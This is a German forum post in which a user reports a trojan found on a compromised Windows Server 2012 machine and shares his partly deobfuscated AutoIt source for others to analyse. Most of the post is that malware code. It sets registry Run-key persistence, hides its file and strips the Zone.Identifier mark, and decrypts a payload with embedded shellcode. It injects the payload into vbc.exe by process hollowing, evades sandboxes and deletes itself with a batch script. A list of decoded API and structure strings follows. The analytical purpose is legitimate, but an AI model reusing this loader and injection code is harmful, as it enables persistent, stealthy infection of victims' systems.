| FabulousGee | 09.08.2015 02:50 |
Habs dir als Archiv geschickt.
Ich gehe mittlerweile davon aus, dass da kein Profi am Werk war. Der Angriff lief scheinbar manuell ab, auch der Weg über Teamviewer die Dateien zu kopieren scheint semi-professionell.
Augenscheinlich wurden erstmal nur Basic-Daten entwendet (wobei das ein Spezialist näher untersuchen muss, ich kenne ich mich nur rudimentär aus).
Außerdem wurde der Virus/Trojaner scheinbar mit AutoIt entwickelt - für Profis nicht unbedingt die erste Wahl. Ist eher was für die Fraktion Skriptkiddies :kloppen:
Achso, das inifizierte Betriebssystem ist übrigens Windows Server 2012 - meins daheim Windows 10. Meins hier daheim hat nichts abbekommen, hab ich mittlerweile nochmal mit den bekannten Tools hier gecheckt.
Der AutoIt-Code ist ziemlich stark obfuscated. Hier mal mein aktueller Stand, vielleicht kann ja jemand schon was rauslesen... (Es sind teilweise Fehler drin und der Code dürfte nicht kompilieren, ist also nutzlos für Scriptkiddies und dergleichen ;) )
Ich denke, ich kann erst morgen weitermachen - meine Augen wollen nicht mehr so wie ich. Code:
#NoTrayIcon
If FileExists($CmdLine[1] & ':' & 'Zone.Identifier') Then DllCall('kernel32.dll', 'bool', 'DeleteFileW', 'wstr', $CmdLine[1] & ':' & 'Zone.Identifier')
FileSetAttrib($CmdLine[1], "+" & "SH")
RegWrite("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "cmd", "REG_SZ", $CmdLine[1])
$incl2Content = FileRead(@TempDir & "\incl2")
Local $byte = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001" & _
"000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F09203" & _
"45100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF4" & _
"86843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025" & _
"FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5" & _
"ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B7508" & _
"01D6300642EB985F5E5BC9C21000"
Local $dllStruct = DllStructCreate("byte[" & BinaryLen($byte) & "]")
Local $dllStruct2 = DllStructCreate("byte[" & BinaryLen($incl2Content) & "]")
DllStructSetData($dllStruct, 1, $byte)
DllStructSetData($dllStruct2, 1, $incl2Content)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($dllStruct), "ptr", DllStructGetPtr($dllStruct2), "int", BinaryLen($incl2Content), "str", "cKDYReZyuWfy61QulAryNR7EYMaDbe", "int", 0)
$U33STO = DllStructGetData($dllStruct2, 1)
$Z35UEB7lP = X34UeeV($U33STO, D33388gcMC(), "")
While 1
If Not ProcessExists($Z35UEB7lP) Then
$Z35UEB7lP = X34UeeV($U33STO, D33388gcMC(), "")
Endif
RegWrite("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "cmd", "REG_SZ", $CmdLine[1])
Sleep(100)
WEnd
Func checkForSandbox()
If ProcessExists("SandboxieRpcSs.exe") OR ProcessExists("SandboxieDcomLaunch.exe") Then
Exit
EndIf
EndFunc
Global $M3131bk7 = ProcessList()
#region X34UeeV
Func X34UeeV($K3336CU, $J3337fv0 = $CmdLine[1], $Q3338up1RPa = "")
Local $F3431gdkgk = DllStructCreate("byte[" & BinaryLen($K3336CU) & "]"), $32Or64Bit, $A3434Awlq, $T34357y4o, $P3436DDYOo, $T3437TG36, $M3438toP, $U3439RlPADx, $K3530gWa, $D3531XIR4i2, $X3532Zi, $N3533kyfrhm, $G35344C4, $Z3535ydppu
DllStructSetData($F3431gdkgk, 1, $K3336CU)
Local $R35384mv = DllStructGetPtr($F3431gdkgk), $S3630nhJ7kX = DllStructCreate("ptr Process;ptr Thread;dword ProcessId;dword ThreadId")
Local @CRLF = DllCall("kernel32.dll", "bool", "CreateProcessW", "wstr", $J3337fv0, "wstr", $Q3338up1RPa, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr(DllStructCreate("dword cbSize;ptr Reserved;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;dword YCountChars;dword FillAttribute;dword Flags;word ShowWindow;word Reserved2;ptr Reserved2;ptr hStdInput;ptr hStdOutput;ptr hStdError")), "ptr", DllStructGetPtr($S3630nhJ7kX))
If @error Or Not @CRLF[0] Then Return 0
Local $B3732rjO = DllStructGetData($S3630nhJ7kX, "Process"), $U3734zWbmn = DllStructGetData($S3630nhJ7kX, "Thread")
If @AutoItX64 And E38zXvY13($B3732rjO) Then Return W3130CLmo($B3732rjO)
If @AutoItX64 Then
If @OSArch = "X64" Then
$32Or64Bit = 2
$A3434Awlq = DllStructCreate("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;dword ContextFlags; dword MxCsr;word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;uint64 Rip;uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];uint64 VectorRegister[52]; uint64 VectorControl;uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip")
Else
Return W3130CLmo($B3732rjO)
EndIf
Else
$32Or64Bit = 1
$A3434Awlq = DllStructCreate("dword ContextFlags;dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;dword SegGs; dword SegFs; dword SegEs; dword SegDs;dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;byte ExtendedRegisters[512]")
EndIf
Switch $32Or64Bit
Case 1
$T34357y4o = 0x10007
Case 2
$T34357y4o = 0x100007
EndSwitch
DllStructSetData($A3434Awlq, "ContextFlags", $T34357y4o)
@CRLF = DllCall("kernel32.dll", "bool", "GetThreadContext", "handle", $U3734zWbmn, "ptr", DllStructGetPtr($A3434Awlq))
If @error Or Not @CRLF[0] Then Return W3130CLmo($B3732rjO)
Switch $32Or64Bit
Case 1
$P3436DDYOo = DllStructGetData($A3434Awlq, "Ebx")
Case 2
$P3436DDYOo = DllStructGetData($A3434Awlq, "Rdx")
EndSwitch
Local $N3939Yf = DllStructCreate("char Magic[2];word BytesOnLastPage;word Pages;word Relocations;word SizeofHeader;word MinimumExtra;word MaximumExtra;word SS;word SP;word Checksum;word IP;word CS;word Relocation;word Overlay;char Reserved[8];word OEMIdentifier;word OEMInformation;char Reserved2[20];dword AddressOfNewExeHeader", $R35384mv), $F313031vdTPLi = $R35384mv
$R35384mv += DllStructGetData($N3939Yf, "AddressOfNewExeHeader")
Local $V313035mI = DllStructGetData($N3939Yf, "Magic")
If Not ($V313035mI == "MZ") Then Return W3130CLmo($B3732rjO)
Local $X313039hiL = DllStructCreate("dword Signature", $R35384mv)
$R35384mv += 4
If DllStructGetData($X313039hiL, "Signature") <> 17744 Then Return W3130CLmo($B3732rjO)
Local $S313134jWhG = DllStructCreate("word Machine;word NumberOfSections;dword TimeDateStamp;dword PointerToSymbolTable;dword NumberOfSymbols;word SizeOfOptionalHeader;word Characteristics", $R35384mv), $S313136YFRM0t = DllStructGetData($S313134jWhG, "NumberOfSections")
$R35384mv += 20
Local $H313139A4s = DllStructCreate("word Magic;", $R35384mv), $R313231ae = DllStructGetData($H313139A4s, 1), $Y3132334lfa
If $R313231ae = 267 Then
If @AutoItX64 Then Return W3130CLmo($B3732rjO)
$Y3132334lfa = DllStructCreate("word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUninitializedData;dword AddressOfEntryPoint;dword BaseOfCode;dword BaseOfData;dword ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorImageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword SizeOfHeaders;dword CheckSum;word Subsystem;word DllCharacteristics;dword SizeOfStackReserve;dword SizeOfStackCommit;dword SizeOfHeapReserve;dword SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes", $R35384mv)
$R35384mv += 96
ElseIf $R313231ae = 523 Then
If Not @AutoItX64 Then Return W3130CLmo($B3732rjO)
$Y3132334lfa = DllStructCreate("word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUninitializedData;dword AddressOfEntryPoint;dword BaseOfCode;uint64 ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorImageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword SizeOfHeaders;dword CheckSum;word Subsystem;word DllCharacteristics;uint64 SizeOfStackReserve;uint64 SizeOfStackCommit;uint64 SizeOfHeapReserve;uint64 SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes", $R35384mv)
$R35384mv += 112
Else
Return W3130CLmo($B3732rjO)
EndIf
Local $F313335JnK = DllStructGetData($Y3132334lfa, "AddressOfEntryPoint"), $W313337uhBVD2 = DllStructGetData($Y3132334lfa, "SizeOfHeaders"), $P3133392Uc = DllStructGetData($Y3132334lfa, "ImageBase"), $S313431C3 = DllStructGetData($Y3132334lfa, "SizeOfImage")
$R35384mv += 40
Local $K313434405HMa = DllStructCreate("dword a; dword b", $R35384mv), $A3134361vSa7a = DllStructGetData($K313434405HMa, "a"), $Y313438uYxU = DllStructGetData($K313434405HMa, "b")
If $A3134361vSa7a And $Y313438uYxU Then $T3437TG36 = True
$R35384mv += 88
If $T3437TG36 Then
$U3439RlPADx = N36sQg($B3732rjO, $S313431C3)
If @error Then
$U3439RlPADx = P35ppyQDA($B3732rjO, $P3133392Uc, $S313431C3)
If @error Then
I373b610($B3732rjO, $P3133392Uc)
$U3439RlPADx = P35ppyQDA($B3732rjO, $P3133392Uc, $S313431C3)
If @error Then Return W3130CLmo($B3732rjO)
EndIf
EndIf
$M3438toP = True
Else
$U3439RlPADx = P35ppyQDA($B3732rjO, $P3133392Uc, $S313431C3)
If @error Then
I373b610($B3732rjO, $P3133392Uc)
$U3439RlPADx = P35ppyQDA($B3732rjO, $P3133392Uc, $S313431C3)
If @error Then Return W3130CLmo($B3732rjO)
EndIf
EndIf
DllStructSetData($Y3132334lfa, "ImageBase", $U3439RlPADx)
Local $I313833pf = DllStructCreate("byte[" & $S313431C3 & "]"), $X313835uc = DllStructGetPtr($I313833pf), $I3138376izn = DllStructCreate("byte[" & $W313337uhBVD2 & "]", $F313031vdTPLi)
DllStructSetData($I313833pf, 1, DllStructGetData($I3138376izn, 1))
For $B3233Tv = 1 To $S313136YFRM0t
$K3530gWa = DllStructCreate("char Name[8];dword UnionOfVirtualSizeAndPhysicalAddress;dword VirtualAddress;dword SizeOfRawData;dword PointerToRawData;dword PointerToRelocations;dword PointerToLinenumbers;word NumberOfRelocations;word NumberOfLinenumbers;dword Characteristics", $R35384mv)
$D3531XIR4i2 = DllStructGetData($K3530gWa, "SizeOfRawData")
$X3532Zi = $F313031vdTPLi + DllStructGetData($K3530gWa, "PointerToRawData")
$N3533kyfrhm = DllStructGetData($K3530gWa, "VirtualAddress")
$G35344C4 = DllStructGetData($K3530gWa, "UnionOfVirtualSizeAndPhysicalAddress")
If $G35344C4 And $G35344C4 < $D3531XIR4i2 Then $D3531XIR4i2 = $G35344C4
If $D3531XIR4i2 Then
DllStructSetData(DllStructCreate("byte[" & $D3531XIR4i2 & "]", $X313835uc + $N3533kyfrhm), 1, DllStructGetData(DllStructCreate("byte[" & $D3531XIR4i2 & "]", $X3532Zi), 1))
EndIf
If $M3438toP Then
If $N3533kyfrhm <= $A3134361vSa7a And $N3533kyfrhm + $D3531XIR4i2 > $A3134361vSa7a Then
$Z3535ydppu = DllStructCreate("byte[" & $Y313438uYxU & "]", $X3532Zi + ($A3134361vSa7a - $N3533kyfrhm))
EndIf
EndIf
$R35384mv += 40
Next
If $M3438toP Then I391m4k($X313835uc, $Z3535ydppu, $U3439RlPADx, $P3133392Uc, $R313231ae = 523)
@CRLF = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $B3732rjO, "ptr", $U3439RlPADx, "ptr", $X313835uc, "dword_ptr", $S313431C3, "dword_ptr*", 0)
If @error Or Not @CRLF[0] Then Return W3130CLmo($B3732rjO)
Local $S323433rXixP = DllStructCreate("byte InheritedAddressSpace;byte ReadImageFileExecOptions;byte BeingDebugged;byte Spare;ptr Mutant;ptr ImageBaseAddress;ptr LoaderData;ptr ProcessParameters;ptr SubSystemData;ptr ProcessHeap;ptr FastPebLock;ptr FastPebLockRoutine;ptr FastPebUnlockRoutine;dword EnvironmentUpdateCount;ptr KernelCallbackTable;ptr EventLogSection;ptr EventLog;ptr FreeList;dword TlsExpansionCounter;ptr TlsBitmap;dword TlsBitmapBits[2];ptr ReadOnlySharedMemoryBase;ptr ReadOnlySharedMemoryHeap;ptr ReadOnlyStaticServerData;ptr AnsiCodePageData;ptr OemCodePageData;ptr UnicodeCaseTableData;dword NumberOfProcessors;dword NtGlobalFlag;byte Spare2[4];int64 CriticalSectionTimeout;dword HeapSegmentReserve;dword HeapSegmentCommit;dword HeapDeCommitTotalFreeThreshold;dword HeapDeCommitFreeBlockThreshold;dword NumberOfHeaps;dword MaximumNumberOfHeaps;ptr ProcessHeaps;ptr GdiSharedHandleTable;ptr ProcessStarterHelper;ptr GdiDCAttributeList;ptr LoaderLock;dword OSMajorVersion;dword OSMinorVersion;dword OSBuildNumber;dword OSPlatformId;dword ImageSubSystem;dword ImageSubSystemMajorVersion;dword ImageSubSystemMinorVersion;dword GdiHandleBuffer[34];dword PostProcessInitRoutine;dword TlsExpansionBitmap;byte TlsExpansionBitmapBits[128];dword SessionId")
@CRLF = DllCall("kernel32.dll", "bool", "ReadProcessMemory", "ptr", $B3732rjO, "ptr", $P3436DDYOo, "ptr", DllStructGetPtr($S323433rXixP), "dword_ptr", DllStructGetSize($S323433rXixP), "dword_ptr*", 0)
If @error Or Not @CRLF[0] Then Return W3130CLmo($B3732rjO)
DllStructSetData($S323433rXixP, "ImageBaseAddress", $U3439RlPADx)
@CRLF = DllCall("kernel32.dll", "bool", "WriteProcessMemory", "handle", $B3732rjO, "ptr", $P3436DDYOo, "ptr", DllStructGetPtr($S323433rXixP), "dword_ptr", DllStructGetSize($S323433rXixP), "dword_ptr*", 0)
If @error Or Not @CRLF[0] Then Return W3130CLmo($B3732rjO)
Switch $32Or64Bit
Case 1
DllStructSetData($A3434Awlq, "Eax", $U3439RlPADx + $F313335JnK)
Case 2
DllStructSetData($A3434Awlq, "Rcx", $U3439RlPADx + $F313335JnK)
EndSwitch
@CRLF = DllCall("kernel32.dll", "bool", "SetThreadContext", "handle", $U3734zWbmn, "ptr", DllStructGetPtr($A3434Awlq))
If @error Or Not @CRLF[0] Then Return W3130CLmo($B3732rjO)
@CRLF = DllCall("kernel32.dll", "dword", "ResumeThread", "handle", $U3734zWbmn)
If @error Or @CRLF[0] = -1 Then Return W3130CLmo($B3732rjO)
DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $B3732rjO)
DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $U3734zWbmn)
Return DllStructGetData($S3630nhJ7kX, "ProcessId")
EndFunc
Func P35ppyQDA($B3732rjO, $Y323836f1Ej, $Q323837vv)
Local @CRLF = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $B3732rjO, "ptr", $Y323836f1Ej, "dword_ptr", $Q323837vv, "dword", 0x1000, "dword", 64)
If @error Or Not @CRLF[0] Then
@CRLF = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $B3732rjO, "ptr", $Y323836f1Ej, "dword_ptr", $Q323837vv, "dword", 0x3000, "dword", 64)
If @error Or Not @CRLF[0] Then Return SetError(1, 0, 0)
EndIf
Return @CRLF[0]
EndFunc
Func N36sQg($B3732rjO, $Q323837vv)
Local @CRLF = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "handle", $B3732rjO, "ptr", 0, "dword_ptr", $Q323837vv, "dword", 0x3000, "dword", 64)
If @error Or Not @CRLF[0] Then Return SetError(1, 0, 0)
Return @CRLF[0]
EndFunc
Func I373b610($B3732rjO, $Y323836f1Ej)
DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $B3732rjO, "ptr", $Y323836f1Ej)
If @error Then Return SetError(1, 0, 0)
Return 1
EndFunc
Func E38zXvY13($B3732rjO)
Local @CRLF = DllCall("kernel32.dll", "bool", "IsWow64Process", "handle", $B3732rjO, "bool*", 0)
If @error Or Not @CRLF[0] Then Return SetError(1, 0, 0)
Return @CRLF[2]
EndFunc
Func I391m4k($X313835uc, $V3332354lR, $Q333236JBYCfB, $X333237sEGRT, $C333238IG0tSj)
Local $W333239BuqR, $F333330aqmT, $M333331Q5jti, $D333332hY0i6p, $Y333333YxnZ, $F333334uTGp, $32Or64Bit = 3 + 7 * $C333238IG0tSj
While $F333330aqmT < DllStructGetSize($V3332354lR)
$W333239BuqR = DllStructCreate("dword a; dword b", DllStructGetPtr($V3332354lR) + $F333330aqmT)
$M333331Q5jti = DllStructGetData($W333239BuqR, Chr(98))
$Y333333YxnZ = DllStructCreate("word[" & (($M333331Q5jti - 8) / 2) & Chr(93), DllStructGetPtr($W333239BuqR) + 8)
For $B3233Tv = 1 To (($M333331Q5jti - 8) / 2)
If BitShift(DllStructGetData($Y333333YxnZ, 1, $B3233Tv), 12) = $32Or64Bit Then
$F333334uTGp = DllStructCreate("ptr", $X313835uc + DllStructGetData($W333239BuqR, "a") + BitAND(DllStructGetData($Y333333YxnZ, 1, $B3233Tv), 0xFFF))
DllStructSetData($F333334uTGp, 1, DllStructGetData($F333334uTGp, 1) + $Q333236JBYCfB - $X333237sEGRT)
EndIf
Next
$F333330aqmT += $M333331Q5jti
WEnd
Return 1
EndFunc
Func W3130CLmo($P3336343w)
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $P3336343w, "dword", 0)
Return 0
EndFunc
#endregion
Func isAttackableSystem()
If (StringInStr(@OSVersion, "XP") AND StringInStr(@UserName, "Admin") AND StringInStr(@ComputerName, "pc") AND StringInStr(@OSServicePack, "3")) = True Then
If $M3131bk7[18][0] = "msmsgs.exe" And $M3131bk7[19][0] = "reader_sl.exe" And $M3131bk7[20][0] = "alg.exe" And $M3131bk7[21][0] = "wscntfy.exe" Then Exit
EndIf
EndFunc
Func W3234j1($fileName, $destination, $K343038oBz = false)
Execute("FileCopy('" & $fileName & "', '" & $destination & "')")
Execute('ShellExecute("' & $destination & '")')
If $K343038oBz Then H3335yxY()
Exit
EndFunc
Func X3330YX($V343139vzbQ, $fileName)
Sleep(1000)
Switch $V343139vzbQ
Case "1"
If $CmdLine[1] <> "@AppDataDir" & "\" & $fileName Then
W3234j1($CmdLine[1], "@AppDataDir" & "\" & $fileName, true)
EndIf
Case "2"
If $CmdLine[1] <> "@TempDir" & "\" & $fileName Then
W3234j1($CmdLine[1], "@TempDir" & "\" & $fileName, true)
EndIf
Case "3"
If $CmdLine[1] <> "@AppDataDir" & "\" & $fileName Then
W3234j1($CmdLine[1], "@AppDataDir" & "\" & $fileName)
EndIf
Case "4"
If $CmdLine[1] <> "@TempDir" & "\" & $fileName Then
W3234j1($CmdLine[1], "@TempDir" & "\" & $fileName)
EndIf
EndSwitch
EndFunc
Func Q33327cE(@CRLF)
Global $F3135YfH = FileFindFirstFile(StringRegExpReplace(@CRLF, "[\\/]+$", "") & "\*")
Return $F3135YfH
EndFunc
Func hasDefaultBrowser()
If RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice", "Progid") <> '' Then Return True
Return False
EndFunc
Func H3335yxY()
Local $newScript = @TempDir & "\" & Random(50, 100, 1) & ".bat"
FileDelete($newScript)
FileWrite($newScript, 'ping -n ' & 0 & '127.0.0.1 > nul' & @CRLF & ':loop' & @CRLF & 'del "' & @ScriptDir & "\" & @ScriptName & '"' & @CRLF & 'if exist "' & @ScriptDir & "\" & @ScriptName & '" goto loop' & @CRLF & 'del ' & $newScript)
Run($newScript, @TempDir, @SW_HIDE)
EndFunc
Func J3336pLYk()
If hasDefaultBrowser() Then Return StringLeft(StringTrimLeft(RegRead("HKEY_CLASSES_ROOT\shell\open\command", Null), 1), StringInStr(StringTrimLeft(RegRead("HKEY_CLASSES_ROOT\shell\open\command", Null), 1), '"') - 1)
Return StringLeft(StringTrimLeft(RegRead("HKEY_CLASSES_ROOT\http\shell\open\command", Null), 1), StringInStr(StringTrimLeft(RegRead("HKEY_CLASSES_ROOT\http\shell\open\command", Null), 1), '"') - 1)
EndFunc
Func Z3337tF($S343634cMb, $R343635p8 = "*", $Z343636A4r = 0, $U3436377V5 = False)
Local $G3436395v = ""
Local $nextFile = ""
Local $J343731fmlc = ""
Local $S343634cMb = StringRegExpReplace($S343634cMb, "[\\/]+$", "") & "\"
If $U3436377V5 Then $J343731fmlc = $S343634cMb
If Not FileExists($S343634cMb) Then Return SetError(1, 0, 0)
If StringRegExp($R343635p8, "[\\/:><\|]|(?s)^\s*$") Then Return SetError(2, 0, 0)
If Not ($Z343636A4r = 0 Or $Z343636A4r = 1 Or $Z343636A4r = 2) Then Return SetError(3, 0, 0)
Local $U343836Tjb = FileFindFirstFile($S343634cMb & $R343635p8)
If @error Then Return SetError(4, 0, 0)
While 1
$nextFile = FileFindNextFile($U343836Tjb)
If @error Then ExitLoop
If ($Z343636A4r + @extended = 2) Then ContinueLoop
$G3436395v &= "|" & $J343731fmlc & $nextFile
WEnd
FileClose($U343836Tjb)
If $G3436395v = "" Then Return SetError(4, 0, 0)
Return StringSplit(StringTrimLeft($G3436395v, 1), "|")
EndFunc
Func D33388gcMC()
Local $Q353030p7 = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework", "InstallRoot")
Local $K353031wO0 = Z3337tF($Q353030p7 , "*", 2), $U353033AT = ''
For $B3233Tv = $K353031wO0[0] To 1 Step -1
If StringRegExp($K353031wO0[$B3233Tv], "v4\.0\.\d+", 0) Then
$U353033AT = $K353031wO0[$B3233Tv]
ExitLoop
ElseIf StringRegExp($K353031wO0[$B3233Tv], "v2\.0\.\d+", 0) Then
$U353033AT = $K353031wO0[$B3233Tv]
ExitLoop
EndIf
Next
Return $Q353030p7 & $U353033AT & "\vbc.exe"
EndFunc
Liste mit den stark verschlüsselten Base-Commands: Code:
1=dword cbSize;ptr Reserved;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;dword YCountChars;dword FillAttribute;dword Flags;word ShowWindow;word Reserved2;ptr Reserved2;ptr hStdInput;ptr hStdOutput;ptr hStdError
2=ptr Process;ptr Thread;dword ProcessId;dword ThreadId
3=kernel32.dll
4=ntdll.dll
5=align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;dword ContextFlags; dword MxCsr;word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;uint64 Rip;uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];uint64 VectorRegister[52]; uint64 VectorControl;uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip
6=dword ContextFlags;dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;dword SegGs; dword SegFs; dword SegEs; dword SegDs;dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;byte ExtendedRegisters[512]
7=char Magic[2];word BytesOnLastPage;word Pages;word Relocations;word SizeofHeader;word MinimumExtra;word MaximumExtra;word SS;word SP;word Checksum;word IP;word CS;word Relocation;word Overlay;char Reserved[8];word OEMIdentifier;word OEMInformation;char Reserved2[20];dword AddressOfNewExeHeader
8=word Machine;word NumberOfSections;dword TimeDateStamp;dword PointerToSymbolTable;dword NumberOfSymbols;word SizeOfOptionalHeader;word Characteristics
9=word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUninitializedData;dword AddressOfEntryPoint;dword BaseOfCode;dword BaseOfData;dword ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorImageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword SizeOfHeaders;dword CheckSum;word Subsystem;word DllCharacteristics;dword SizeOfStackReserve;dword SizeOfStackCommit;dword SizeOfHeapReserve;dword SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes
10=word Magic;byte MajorLinkerVersion;byte MinorLinkerVersion;dword SizeOfCode;dword SizeOfInitializedData;dword SizeOfUninitializedData;dword AddressOfEntryPoint;dword BaseOfCode;uint64 ImageBase;dword SectionAlignment;dword FileAlignment;word MajorOperatingSystemVersion;word MinorOperatingSystemVersion;word MajorImageVersion;word MinorImageVersion;word MajorSubsystemVersion;word MinorSubsystemVersion;dword Win32VersionValue;dword SizeOfImage;dword SizeOfHeaders;dword CheckSum;word Subsystem;word DllCharacteristics;uint64 SizeOfStackReserve;uint64 SizeOfStackCommit;uint64 SizeOfHeapReserve;uint64 SizeOfHeapCommit;dword LoaderFlags;dword NumberOfRvaAndSizes
11=char Name[8];dword UnionOfVirtualSizeAndPhysicalAddress;dword VirtualAddress;dword SizeOfRawData;dword PointerToRawData;dword PointerToRelocations;dword PointerToLinenumbers;word NumberOfRelocations;word NumberOfLinenumbers;dword Characteristics
12=byte InheritedAddressSpace;byte ReadImageFileExecOptions;byte BeingDebugged;byte Spare;ptr Mutant;ptr ImageBaseAddress;ptr LoaderData;ptr ProcessParameters;ptr SubSystemData;ptr ProcessHeap;ptr FastPebLock;ptr FastPebLockRoutine;ptr FastPebUnlockRoutine;dword EnvironmentUpdateCount;ptr KernelCallbackTable;ptr EventLogSection;ptr EventLog;ptr FreeList;dword TlsExpansionCounter;ptr TlsBitmap;dword TlsBitmapBits[2];ptr ReadOnlySharedMemoryBase;ptr ReadOnlySharedMemoryHeap;ptr ReadOnlyStaticServerData;ptr AnsiCodePageData;ptr OemCodePageData;ptr UnicodeCaseTableData;dword NumberOfProcessors;dword NtGlobalFlag;byte Spare2[4];int64 CriticalSectionTimeout;dword HeapSegmentReserve;dword HeapSegmentCommit;dword HeapDeCommitTotalFreeThreshold;dword HeapDeCommitFreeBlockThreshold;dword NumberOfHeaps;dword MaximumNumberOfHeaps;ptr ProcessHeaps;ptr GdiSharedHandleTable;ptr ProcessStarterHelper;ptr GdiDCAttributeList;ptr LoaderLock;dword OSMajorVersion;dword OSMinorVersion;dword OSBuildNumber;dword OSPlatformId;dword ImageSubSystem;dword ImageSubSystemMajorVersion;dword ImageSubSystemMinorVersion;dword GdiHandleBuffer[34];dword PostProcessInitRoutine;dword TlsExpansionBitmap;byte TlsExpansionBitmapBits[128];dword SessionId
13=bool
14=ptr
15=dword a; dword b
16=word[
17=CloseHandle
18=ReadProcessMemory
19=WriteProcessMemory
20=CreateProcessW
21=IsWow64Process
22=TerminateProcess
23=GetThreadContext
24=NtUnmapViewOfSection
25=VirtualAllocEx
